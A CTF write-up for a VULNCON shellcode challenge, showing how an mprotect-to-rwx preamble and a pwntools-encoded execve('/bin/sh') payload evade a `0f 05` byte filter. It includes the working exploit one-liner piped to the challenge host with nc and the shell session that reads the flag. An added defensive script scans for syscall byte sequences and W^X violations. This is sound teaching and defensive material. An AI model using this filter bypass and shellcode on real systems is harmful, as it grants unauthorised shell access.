Tags: pwntools shellcraft 

This challenge is a basic "execute your shellcode" challenge with the following constraints:

1. The buffer containing the shellcode is set to execute-only with `mprotect`. Because the buffer is not writable, self-decoding (polymorphic) payloads cannot rewrite themselves in place.
2. Payloads containing the byte sequence `0f 05` are not permitted. This is the encoding of the `syscall` instruction.

The following exploit re-uses the `mprotect` entry already present in the binary's GOT (called via `0x4010f0`) to set read, write and execute permissions on the shellcode buffer (`0x69420000`, length `0x100`, `PROT_READ|PROT_WRITE|PROT_EXEC` = `0x7`), and then executes a standard `execve("/bin/sh")` shellcode that pwntools has encoded so that the submitted bytes never contain `0f 05`; the decoder writes the real `syscall` bytes into the now-writable buffer at run time.
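The two checks the challenge relies on, a static byte filter and the page protection on the buffer, are worth looking at from the defending side. The following is an added example, not code from the writeup or the challenge: it mirrors the stated filter (reject `0f 05`), generalises it to the other x86 kernel-entry sequences (`0f 34` for `sysenter`, `cd 80` for `int 0x80`), and decodes an `mprotect` protection value so a reviewer can spot a writable-and-executable mapping, which is the condition that lets a decoder defeat the byte filter. The sample payloads below are constructed for the test only.

```python
# Added example (not from the writeup): static payload filter and W^X check.
from dataclasses import dataclass
from typing import List

# Byte encodings of the x86/x86-64 kernel-entry instructions. The challenge in the
# writeup only filters the first one; a reviewer would want all three covered.
SYSCALL_SEQUENCES = {
    b"\x0f\x05": "syscall",
    b"\x0f\x34": "sysenter",
    b"\xcd\x80": "int 0x80",
}

# Linux mprotect protection bits (from <sys/mman.h>).
PROT_READ, PROT_WRITE, PROT_EXEC = 0x1, 0x2, 0x4


@dataclass
class Finding:
    offset: int      # byte offset of the sequence inside the payload
    mnemonic: str    # instruction the sequence encodes


def scan_payload(payload: bytes) -> List[Finding]:
    """Return every kernel-entry sequence found in the raw payload bytes, in offset order.

    This is a purely static check: it sees only the bytes as submitted, not bytes
    that a decoder stub might produce later at run time.
    """
    findings = []
    for seq, name in SYSCALL_SEQUENCES.items():
        start = 0
        while True:
            idx = payload.find(seq, start)
            if idx < 0:
                break
            findings.append(Finding(idx, name))
            start = idx + 1  # allow overlapping matches such as 0f 0f 05
    return sorted(findings, key=lambda f: f.offset)


def challenge_filter_accepts(payload: bytes) -> bool:
    """The challenge's rule as described in the writeup: reject any payload containing 0f 05."""
    return b"\x0f\x05" not in payload


def describe_prot(prot: int) -> str:
    """Render an mprotect protection value as an rwx string, e.g. 0x7 -> 'rwx'."""
    return "".join(
        flag if prot & bit else "-"
        for bit, flag in ((PROT_READ, "r"), (PROT_WRITE, "w"), (PROT_EXEC, "x"))
    )


def violates_wx(prot: int) -> bool:
    """True when a mapping is both writable and executable (the state the exploit creates).

    A byte filter is only meaningful while the buffer stays non-writable; once the
    region is rwx, any filtered instruction can be written into it after the check.
    """
    return bool(prot & PROT_WRITE) and bool(prot & PROT_EXEC)


def review(payload: bytes, prot: int) -> dict:
    """Combine both checks into one verdict for a submitted payload and its buffer protection."""
    findings = scan_payload(payload)
    return {
        "static_filter_passed": not findings,
        "findings": [(f.offset, f.mnemonic) for f in findings],
        "buffer_prot": describe_prot(prot),
        "wx_violation": violates_wx(prot),
    }


if __name__ == "__main__":
    # Constructed samples: 'xor rax, rax' followed by a syscall, and the same with int 0x80.
    sample = b"\x48\x31\xc0\x0f\x05\x90\xcd\x80"
    print(review(sample, PROT_READ | PROT_EXEC))
    print(review(b"\x48\x31\xc0", PROT_READ | PROT_WRITE | PROT_EXEC))
```

The `review` function reports two independent facts: whether the submitted bytes pass the static filter, and whether the buffer's protection would let run-time code rewrite them anyway. A payload that passes the first check while the second flag is true is exactly the situation the writeup exploits, so a hardened version of the challenge would keep the buffer at `r-x` rather than rely on the filter alone.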

```bash
cat exploit.sh
#!/bin/bash

# Set mprotect rwx preamble.
# mov rdi, 0x69420000
# mov rsi, 0x100
# mov rdx, 0x7
# mov r8, 0x4010f0
# call r8

(python -c 'import sys;from pwn import *;x=b"\x48\xC7\xC7\x00\x00\x42\x69\x48\xC7\xC6\x00\x01\x00\x00\x48\xC7\xC2\x07\x00\x00\x00\x49\xC7\xC0\xF0\x10\x40\x00\x41\xFF\xD0" + encode(asm(pwnlib.shellcraft.amd64.linux.sh(), arch="amd64"), avoid=b"\x0f\x05");sys.stdout.buffer.write(x)'; cat -) | nc 35.228.15.118 1338
```

Running the exploit gives us a shell on the target, from which we can read the flag:

```console
$ bash exploit.sh
Are you really good at shellcoding Lets try :
id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
ls -la
total 64
drwxr-xr-x 1 root root 4096 Dec 4 10:09 .
drwxr-xr-x 1 root root 4096 Nov 29 05:47 ..
-rw-r--r-- 1 root root 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 root root 3771 Feb 25 2020 .bashrc
-rw-r--r-- 1 root root 807 Feb 25 2020 .profile
-rwxr-xr-x 1 root root 17128 Nov 26 15:51 chall
-rw-rw-r-- 1 root root 48 Dec 4 06:27 flag
-rwxr-xr-x 1 root root 18744 Nov 29 11:11 ynetd
cat flag
VULNCON{Gu355_u_d0nt_n33d_th3_5y5c4ll_aft3r4ll}
```

**Flag:** `VULNCON{Gu355_u_d0nt_n33d_th3_5y5c4ll_aft3r4ll}`

Original writeup (https://nandynarwhals.org/vulncon-ctf-2021/#pwnmore-than-shellcoding).